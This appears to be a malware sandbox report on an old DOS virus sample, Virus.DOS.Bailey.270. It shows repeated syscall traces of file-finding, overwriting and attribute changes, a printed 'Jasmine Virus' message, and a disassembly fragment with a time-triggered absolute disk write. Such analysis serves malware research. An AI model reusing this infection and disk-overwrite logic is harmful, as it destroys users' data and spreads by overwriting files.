Sample viewer

vx.netlux.org/Virus.DOS.Bailey.270

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:45:27.315016322Z	44	PC: 12a4d \| Get time 0x12a4d: cmp ch, 0 0x12a50: jne 0x12a5c 0x12a52: mov al, 2 0x12a54: mov cx, 5 0x12a57: mov dx, 0 0x12a5a: int 0x26 0x12a5c: mov ah, 0x4e 0x12a5e: mov dx, 0x103 0x12a61: xor cx, cx 0x12a63: int 0x21 0x12a65: mov dx, 0x9e 0x12a68: mov ah, 0x3d 0x12a6a: mov al, 1 0x12a6c: int 0x21 0x12a6e: mov bx, ax 0x12a70: mov ah, 0x40 0x12a72: mov dx, 0x100 0x12a75: mov cx, 0x10e 0x12a78: int 0x21 0x12a7a: mov ah, 0x3e
2018-12-17T22:45:27.31859864Z	78	PC: 12a65 \| Find first file
2018-12-17T22:45:27.325645917Z	61	PC: 12a6e \| Open file (Filename = '')
2018-12-17T22:45:27.328450636Z	64	PC: 12a7a \| Write file or device (Write 270 bytes on handle 2)
2018-12-17T22:45:27.342582518Z	62	PC: 12a7e \| Close file
2018-12-17T22:45:27.345327631Z	67	PC: 12a87 \| Get or set file attributes
2018-12-17T22:45:27.3668412Z	79	PC: 12a8b \| Find next file
2018-12-17T22:45:27.369247682Z	61	PC: 12a94 \| Open file (Filename = '')
2018-12-17T22:45:27.372313408Z	64	PC: 12aa0 \| Write file or device (Write 270 bytes on handle 2)
2018-12-17T22:45:27.374353217Z	62	PC: 12aa4 \| Close file
2018-12-17T22:45:27.377303008Z	67	PC: 12aad \| Get or set file attributes
2018-12-17T22:45:27.38622188Z	79	PC: 12ab1 \| Find next file
2018-12-17T22:45:27.389134861Z	61	PC: 12aba \| Open file (Filename = '')
2018-12-17T22:45:27.392038319Z	64	PC: 12ac6 \| Write file or device (Write 270 bytes on handle 2)
2018-12-17T22:45:27.394690206Z	62	PC: 12aca \| Close file
2018-12-17T22:45:27.406064775Z	67	PC: 12ad3 \| Get or set file attributes
2018-12-17T22:45:27.411435945Z	9	PC: 12ada \| Display string (String= 'The Jasmine Virus is loose, better protect your computer.Beware!There now it works! [JD] ')
2018-12-17T22:45:27.420530545Z	76	PC: 12ade \| Terminate with return code (Return code = '36')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8548,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:21:16.795697943Z	44	PC: 12a4d \| Get time 0x12a4d: cmp ch, 0 0x12a50: jne 0x12a5c 0x12a52: mov al, 2 0x12a54: mov cx, 5 0x12a57: mov dx, 0 0x12a5a: int 0x26 0x12a5c: mov ah, 0x4e 0x12a5e: mov dx, 0x103 0x12a61: xor cx, cx 0x12a63: int 0x21 0x12a65: mov dx, 0x9e 0x12a68: mov ah, 0x3d 0x12a6a: mov al, 1 0x12a6c: int 0x21 0x12a6e: mov bx, ax 0x12a70: mov ah, 0x40 0x12a72: mov dx, 0x100 0x12a75: mov cx, 0x10e 0x12a78: int 0x21 0x12a7a: mov ah, 0x3e
2018-12-25T12:21:16.802214223Z	78	PC: 12a65 \| Find first file
2018-12-25T12:21:16.808734393Z	61	PC: 12a6e \| Open file (Filename = '')
2018-12-25T12:21:16.811012645Z	64	PC: 12a7a \| Write file or device (Write 270 bytes on handle 2)
2018-12-25T12:21:16.825897734Z	62	PC: 12a7e \| Close file
2018-12-25T12:21:16.828202894Z	67	PC: 12a87 \| Get or set file attributes
2018-12-25T12:21:16.833518423Z	79	PC: 12a8b \| Find next file
2018-12-25T12:21:16.835600215Z	61	PC: 12a94 \| Open file (Filename = '')
2018-12-25T12:21:16.844119739Z	64	PC: 12aa0 \| Write file or device (Write 270 bytes on handle 2)
2018-12-25T12:21:16.846178692Z	62	PC: 12aa4 \| Close file
2018-12-25T12:21:16.848279226Z	67	PC: 12aad \| Get or set file attributes
2018-12-25T12:21:16.854225049Z	79	PC: 12ab1 \| Find next file
2018-12-25T12:21:16.856652986Z	61	PC: 12aba \| Open file (Filename = '')
2018-12-25T12:21:16.859392267Z	64	PC: 12ac6 \| Write file or device (Write 270 bytes on handle 2)
2018-12-25T12:21:16.867466434Z	62	PC: 12aca \| Close file
2018-12-25T12:21:16.869573038Z	67	PC: 12ad3 \| Get or set file attributes
2018-12-25T12:21:16.875191865Z	9	PC: 12ada \| Display string (String= 'The Jasmine Virus is loose, better protect your computer.Beware!There now it works! [JD] ')
2018-12-25T12:21:16.884466268Z	76	PC: 12ade \| Terminate with return code (Return code = '36')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":1,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8548,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:21:16.978714024Z	44	PC: 12a4d \| Get time 0x12a4d: cmp ch, 0 0x12a50: jne 0x12a5c 0x12a52: mov al, 2 0x12a54: mov cx, 5 0x12a57: mov dx, 0 0x12a5a: int 0x26 0x12a5c: mov ah, 0x4e 0x12a5e: mov dx, 0x103 0x12a61: xor cx, cx 0x12a63: int 0x21 0x12a65: mov dx, 0x9e 0x12a68: mov ah, 0x3d 0x12a6a: mov al, 1 0x12a6c: int 0x21 0x12a6e: mov bx, ax 0x12a70: mov ah, 0x40 0x12a72: mov dx, 0x100 0x12a75: mov cx, 0x10e 0x12a78: int 0x21 0x12a7a: mov ah, 0x3e
2018-12-25T12:21:16.981190259Z	78	PC: 12a65 \| Find first file
2018-12-25T12:21:16.985216585Z	61	PC: 12a6e \| Open file (Filename = '')
2018-12-25T12:21:16.987406292Z	64	PC: 12a7a \| Write file or device (Write 270 bytes on handle 2)
2018-12-25T12:21:17.000676134Z	62	PC: 12a7e \| Close file
2018-12-25T12:21:17.004112274Z	67	PC: 12a87 \| Get or set file attributes
2018-12-25T12:21:17.009002215Z	79	PC: 12a8b \| Find next file
2018-12-25T12:21:17.011000225Z	61	PC: 12a94 \| Open file (Filename = '')
2018-12-25T12:21:17.013916816Z	64	PC: 12aa0 \| Write file or device (Write 270 bytes on handle 2)
2018-12-25T12:21:17.015703942Z	62	PC: 12aa4 \| Close file
2018-12-25T12:21:17.017418749Z	67	PC: 12aad \| Get or set file attributes
2018-12-25T12:21:17.027390849Z	79	PC: 12ab1 \| Find next file
2018-12-25T12:21:17.030076162Z	61	PC: 12aba \| Open file (Filename = '')
2018-12-25T12:21:17.03265077Z	64	PC: 12ac6 \| Write file or device (Write 270 bytes on handle 2)
2018-12-25T12:21:17.035457391Z	62	PC: 12aca \| Close file
2018-12-25T12:21:17.039362118Z	67	PC: 12ad3 \| Get or set file attributes
2018-12-25T12:21:17.052397727Z	9	PC: 12ada \| Display string (String= 'The Jasmine Virus is loose, better protect your computer.Beware!There now it works! [JD] ')
2018-12-25T12:21:17.062317435Z	76	PC: 12ade \| Terminate with return code (Return code = '36')